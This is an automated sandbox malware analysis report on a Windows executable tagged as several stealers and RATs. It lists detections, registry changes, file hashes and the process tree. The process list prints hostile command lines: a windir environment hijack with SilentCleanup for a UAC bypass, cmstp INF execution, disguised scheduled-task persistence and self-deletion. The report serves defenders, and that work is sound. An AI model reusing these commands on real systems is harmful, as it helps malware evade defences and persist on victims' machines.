Malware Analysis Report

2024-09-22 21:56

Sample ID 210805-3n1f6kvxje
Target 7fb10b8ea68c1e0064730018fca3cb39.exe
SHA256 29cf2aec62c3504b1914484feff17ae470b51229b1df06f1a30334a08b6db12a
Tags
asyncrat azorult bitrat oski raccoon fe25b858c52ebb889260990dc343e5dbcf4a96e4 discovery evasion infostealer persistence rat spyware stealer suricata trojan upx
score
10/10


Analysis Overview

score
10/10

SHA256

29cf2aec62c3504b1914484feff17ae470b51229b1df06f1a30334a08b6db12a

Threat Level: Known bad

The file 7fb10b8ea68c1e0064730018fca3cb39.exe was found to be: Known bad.

Malicious Activity Summary

Raccoon

Modifies Windows Defender Real-time Protection settings

Oski

Azorult

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

Contains code to disable Windows Defender

AsyncRat

BitRAT

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M1

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

BitRAT Payload

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18

Raccoon Stealer Payload

Async RAT payload

Downloads MZ/PE file

Executes dropped EXE

UPX packed file

Loads dropped DLL

Reads user/profile data of web browsers

Windows security modification

Reads user/profile data of local email clients

Deletes itself

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Checks installed software on the system

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Kills process with taskkill

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Checks processor information in registry

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Modifies registry key

MITRE ATT&CK Matrix V6

Analysis: static1

Detonation Overview

Reported

2021-08-05 10:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-08-05 10:31

Reported

2021-08-05 10:33

Platform

win7v20210410

Max time kernel

138s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe"

Signatures

AsyncRat

rat asyncrat

Azorult

trojan infostealer azorult

BitRAT

trojan bitrat

BitRAT Payload

Contains code to disable Windows Defender

Modifies Windows Defender Real-time Protection settings

evasion trojan

Oski

infostealer oski

Raccoon

stealer raccoon

Raccoon Stealer Payload

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

suricata

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M1

suricata

Async RAT payload

rat

Downloads MZ/PE file

UPX packed file

upx

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\ProgramData\GFDyrtucbvfdg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\Abthdwq = "C:\\Users\\Public\\Libraries\\qwdhtbA.url" C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ceutdxb = "C:\\Users\\Public\\Libraries\\bxdtueC.url" C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe N/A

Checks installed software on the system

discovery

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\GFDyrtucbvfdg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1096 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1096 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1096 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1096 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1096 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1096 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1096 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1096 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 2028 wrote to memory of 1980 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2028 wrote to memory of 1980 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2028 wrote to memory of 1980 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2028 wrote to memory of 1980 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2028 wrote to memory of 1980 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1096 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe
PID 1096 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe
PID 1096 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe
PID 1096 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe
PID 1096 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe
PID 1164 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1164 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1164 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1164 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1164 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1340 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe
PID 1340 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe
PID 1340 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe
PID 1340 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe
PID 1340 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe
PID 1340 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe
PID 1340 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe
PID 1340 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe
PID 1340 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe
PID 1340 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe
PID 1340 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe
PID 1340 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe
PID 1340 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe
PID 1340 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe
PID 1340 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe
PID 1340 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe
PID 1340 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe
PID 1340 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe
PID 1340 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe
PID 1340 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe
PID 1340 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Windows\SysWOW64\cmd.exe
PID 1340 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Windows\SysWOW64\cmd.exe
PID 1340 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Windows\SysWOW64\cmd.exe
PID 1340 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Windows\SysWOW64\cmd.exe
PID 1216 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1216 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1216 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1216 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1756 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 1536 wrote to memory of 1464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1536 wrote to memory of 1464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1536 wrote to memory of 1464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1536 wrote to memory of 1464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1612 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe
PID 1612 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe
PID 1612 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe
PID 1612 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe
PID 1612 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe

"C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe

"C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe

"C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe"

C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe

"C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe"

C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe

"C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe"

C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe

"C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe"

C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe

"C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /pid 1756 & erase C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\432965539998401\\* & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /pid 1756

C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe

"C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Public\Trast.bat" "

C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe

"C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe

"{path}"

C:\Windows\SysWOW64\reg.exe

reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

C:\Windows\SysWOW64\schtasks.exe

schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe

"{path}"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF1FD.tmp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

\??\c:\windows\SysWOW64\cmstp.exe

"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\qlmkdkl1.inf

C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe

"{path}"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Public\nest.bat" "

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Windows\system32\taskeng.exe

taskeng.exe {0330DFA1-77A4-4383-80D8-94115E19A849} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

Network


Files


memory/1612-111-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe

MD5 23dd723300b2c35a6c94ab0a53293f82
SHA1 8a7fcbc04ea369cd9c2e2f41b0846b7ed12b0f16
SHA256 0088daad429de39bd42663b9b508af98da7b8a3d09e4b7ff0012a8901a32253b
SHA512 ca20ab23308d75a09b01a857215a4f88e3a9f7ce1355096010acef119ed12de51a44033d149e1b632c677861b5d8617a211e7faa499ad59423b49bd02460f047

memory/748-115-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/1164-113-0x0000000000200000-0x0000000000201000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/1612-121-0x0000000000220000-0x0000000000221000-memory.dmp

memory/1612-122-0x0000000000240000-0x000000000025B000-memory.dmp

memory/748-119-0x0000000000A70000-0x0000000000A71000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/2032-127-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
